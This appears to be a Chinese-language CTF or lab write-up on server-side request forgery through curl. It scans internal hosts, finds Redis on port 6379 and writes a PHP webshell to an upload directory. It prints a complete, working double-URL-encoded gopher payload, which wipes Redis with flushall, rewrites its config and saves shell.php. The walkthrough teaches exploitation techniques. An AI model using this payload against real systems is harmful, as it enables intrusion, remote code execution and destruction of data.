curl支持很多协议，有FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE以及LDA

dict被禁用了用（?url=http://172.19.0.3+端口）来探测一下端口吧

172.19.0.3主机只开放一个80端口

看看内网还有其他服务器没

这里可以看到内网还有一台172.19.0.2的主机。

看看这台主机都开放什么端口吧

172.19.0.2主机除了80还有一个redis的6379端口

使用gopher协议写哥PHPShell试试

不能直接在/var/www/html目录下写文件

使用burp扫一下都有哪些目录，发现有一个upload这个文件夹。

我使用的的字典fuzzDicts/paramDict/parameter.txt at master · TheKingOfDuck/fuzzDicts · GitHub

使用gopher协议给/var/www/html/upload 目录下写入

我尝试了用gopher工具生成payload一直用不了，后面用python代码生成的。

这里payload需要再次用url进行编码

gopher%3A%2F%2F172%2E19%2E0%2E2%3A6379%2F%5F%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252425%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2522id%2522%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252420%250D%250A%2Fvar%2Fwww%2Fhtml%2Fupload%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell%2Ephp%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A

看到upload目录里面有了shell.php，去访问一下。